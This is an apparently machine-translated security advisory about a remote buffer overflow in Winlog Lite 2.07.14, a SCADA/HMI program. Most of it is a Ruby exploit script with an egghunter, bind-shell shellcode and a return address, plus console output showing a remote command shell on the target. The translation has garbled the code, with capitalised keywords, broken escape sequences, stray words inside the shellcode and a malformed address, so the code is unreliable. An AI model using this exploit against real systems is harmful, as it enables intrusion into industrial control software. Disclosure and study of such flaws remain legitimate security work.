Sielco Sistemi Winlog Lite Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Sielcosistemi sielco sistemi Winlog Lite 2.07.14
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53811

Winlog Lite is an entry-level SCADA/HMI software Winlog Pro provided by Sielco Sistemi. It evaluates the possibility and simplicity of software packages and is also a solution for creating small management applications.

Winlog Lite has a remote buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code.

<* Source: m1k3 (m1k3 @ s3cur1ty_de)

Link: http://www.securityfocus.com/archive/1/522974

*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

M1k3 () provides the following test methods:

#-Exploit:

# Root @ bt :~ /Msf-scripts # ruby runtime-exploit-01.rb
# Placing the shellcode
# Sleeping...
# Kicking...
# Buffer length: 261
# Root @ bt :~ /Msf-scripts # netcat-v 10.8.28.374444
#10.8.28.37: inverse host lookup failed: Unknown server error: Connection timed out
# (UNKNOWN) [10.8.28.37] 4444 (?) Open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C: \ Documents ents and Settings \ All Users \ Application Data \ Winlog Lite \ Projects \ Ceramics Kiln \ Template>
#
# Important:
#-> The reliability of your exploit depends on that path...
# If you choose another default project or you start another project this path ist not reliable anymore
# You can choose the default project on the installation. I have used Ceramics Kiln

Require 'socket'

Port = "46824"
Host = "10.8.28.37"

S = TCPSocket. open (host, port)

Sleep (0.5)

Egghunter = "\ x66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd \ x2e \ x3c \ x05 \ x5a \ x74"
Egghunter <"\ xef \ xb8 \ x77 \ x6f \ x6f \ x74 \ x8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7"

# Msfpayload windows/shell_bind_tcp R | msfencode-t ruby
# [*] X86/shikata_ga_nai succeeded with size 368 (iteration = 1)
Shellcode =
"\ Xdb \ xc8 \ xd9 \ x74 \ x24 \ xf4 \ x5b \ xba \ x45 \ x76 \ x08 \ xf1 \ x33 \ xc9" +
"\ Xb1 \ x56 \ x31 \ x53 \ x18 \ x83 \ xeb \ xfc \ x03 \ x53 \ x51 \ x94 \ xfd \ x0d" +
"\ Xb1 \ xd1 \ xfe \ xed \ x41 \ x82 \ x77 \ x08 \ x90 \ xec \ x58 \ x20 \ x24" +
"\ X66 \ x0c \ xc8 \ xcf \ x2a \ xa5 \ x5b \ xbd \ xe2 \ xca \ xec \ x08 \ xd5 \ xe5" +
"\ Xed \ xbc \ xd9 \ xaa \ x2d \ xde \ xa5 \ xb0 \ x61 \ x00 \ x97 \ x7a \ x74 \ x41" +
"\ Xd0 \ x67 \ x76 \ x13 \ x89 \ xec \ x24 \ x84 \ xbe \ xb1 \ xf4 \ xa5 \ x10 \ xbe" +
"\ X44 \ xde \ x15 \ x01 \ x30 \ x54 \ x17 \ x52 \ xe8 \ xe3 \ x5f \ x4a \ x83 \ xac" +
"\ X7f \ x6b \ x40 \ xaf \ xbc \ x22 \ xed \ x04 \ x36 \ xb5 \ x27 \ x55 \ xb7 \ x87" +
"\ X07 \ x3a \ x86 \ x27 \ x8a \ x42 \ xce \ x80 \ x74 \ x31 \ x24 \ xf3 \ x09 \ x42" +
"\ Xff \ x89 \ xd5 \ xc7 \ xe2 \ x2a \ x9e \ cross 7 \ xc7 \ xcb \ x73 \ xe6 \ x8c \ xc0" +
"\ X38 \ x6c \ xca \ xc4 \ xbf \ xa1 \ x60 \ xf0 \ x34 \ x44 \ xa7 \ cross \ x0e \ x63" +
"\ X63 \ xd8 \ xd5 \ x0a \ x32 \ x84 \ xb8 \ x33 \ x24 \ x60 \ x65 \ x96 \ x2e \ x83" +
"\ X72 \ xa0 \ x6c \ xcc \ xb7 \ x9f \ x8e \ x0c \ xdf \ xa8 \ xfd \ x3e \ x40 \ x03" +
"\ X6a \ x73 \ x09 \ x8d \ x6d \ x74 \ x20 \ x69 \ xe1 \ x8b \ xca \ x8a \ x2b \ x48" +
"\ X9e \ xda \ x43 \ x79 \ x9e \ xb0 \ x93 \ x86 \ x4b \ x16 \ xc4 \ x28 \ x23 \ xd7" +
"\ Xb4 \ x88 \ x93 \ xbf \ xde \ x06 \ xcc \ xa0 \ xe0 \ xcc \ x7b \ xe7 \ x2e \ x34" +
"\ X28 \ x80 \ x52 \ xca \ xdf \ x0c \ xda \ x2c \ xb5 \ xbc \ x8a \ xe7 \ x21 \ x7f" +
"\ Xe9 \ x3f \ xd6 \ x80 \ xdb \ x13 \ x4f \ x17 \ x53 \ x7a \ x57 \ x18 \ x64 \ xa8" +
"\ Xf4 \ xb5 \ xcc \ x3b \ x8e \ xd5 \ xc8 \ x5a \ x91 \ xf3 \ x78 \ x14 \ xaa \ x94" +
"\ Xf3 \ x48 \ x79 \ x04 \ x03 \ x41 \ xe9 \ xa5 \ x96 \ x0e \ xe9 \ xa0 \ x8a \ x98" +
"\ Xbe \ xe5 \ x7d \ xd1 \ x2a \ x18 \ x27 \ x4b \ x48 \ xe1 \ xb1 \ xb4 \ xc8 \ x3e" +
"\ X02 \ x3a \ xd1 \ xb3 \ x3e \ x18 \ xc1 \ x0d \ xbe \ x24 \ xb5 \ xc1 \ xe9 \ xf2" +
"\ X63 \ xa4 \ x43 \ xb5 \ xdd \ x7e \ x3f \ x1f \ x89 \ x07 \ x73 \ xa0 \ xcf \ x07" +
"\ X5e \ x56 \ x2f \ xb9 \ x37 \ x2f \ x50 \ x76 \ xd0 \ xa7 \ x29 \ x6a \ x40 \ x47" +
"\ Xe0 \ x2e \ x02 \ xa8 \ x07 \ x19 \ xcb \ x39 \ x1a \ x44 \ xec \ x94 \ x59" +
"\ X71 \ x6f \ x1c \ x22 \ x86 \ x6f \ x55 \ x27 \ xc2 \ x37 \ x86 \ x55 \ x5b \ xd2" +
"\ Xa8 \ xca \ x5c \ xf7"

Puts "placing the shellcode"
Buffer = "* x41" * 2000
Buffer <"wootwoot" # egg
Buffer <"\ x90"
Buffer <shellcode
Buffer <"\ x90" * 2000
Print "buffer length: # {buffer. length} \ r \ n"
S. puts (buffer)

Puts "sleeping ..."
Sleep (5)

Puts "kicking ..."
Buffer = "\ x41" * 20 + "\ x14" * 10 + "\ x41" * 167
Buffer <"\ xdf \ x53 \ x51 \ x40" # EIP-> Jmp ESP-Vclx40.bpl-0x405153df
Buffer <"\ x90"
Buffer <egghunter
Buffer <"\ x90" * (59-egghunter. length)
Print "buffer length: # {buffer. length} \ r \ n"
S. puts (buffer)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Sielcosistemi
-------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.sielcosistemi.com/en/download/public/winlog_lite.html